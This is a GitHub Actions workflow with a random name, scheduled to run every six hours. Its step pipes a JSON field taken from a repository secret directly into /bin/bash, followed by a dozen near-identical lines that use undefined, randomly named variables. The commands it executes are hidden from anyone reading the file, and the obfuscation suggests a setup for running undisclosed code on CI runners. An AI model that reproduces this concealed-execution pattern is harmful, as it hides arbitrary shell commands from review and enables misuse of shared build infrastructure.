name: hugouhuohuang
on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hugouhuohuang
        env:
          sped047: ${{ secrets.sped047 }}
        run: |
          echo $sped047 | jq -r .uq7 | /bin/bash
          echo $env2 | jq -r .xjk71 | /bin/bash
          echo $ui34806 | jq -r .fbya52 | /bin/bash
          echo $w9 | jq -r .wx57195 | /bin/bash
          echo $eomb3456 | jq -r .d96281 | /bin/bash
          echo $yopf5 | jq -r .piio79 | /bin/bash
          echo $ioymv15 | jq -r .vhv56 | /bin/bash
          echo $ofswy307 | jq -r .ncmb836 | /bin/bash
          echo $fbh03 | jq -r .hbv28910 | /bin/bash
          echo $v7275 | jq -r .dlln81503 | /bin/bash
          echo $uckjf07 | jq -r .icscf63552 | /bin/bash
          echo $pxoq80 | jq -r .bldc04 | /bin/bash
          echo $vrcj205 | jq -r .qu6545 | /bin/bash

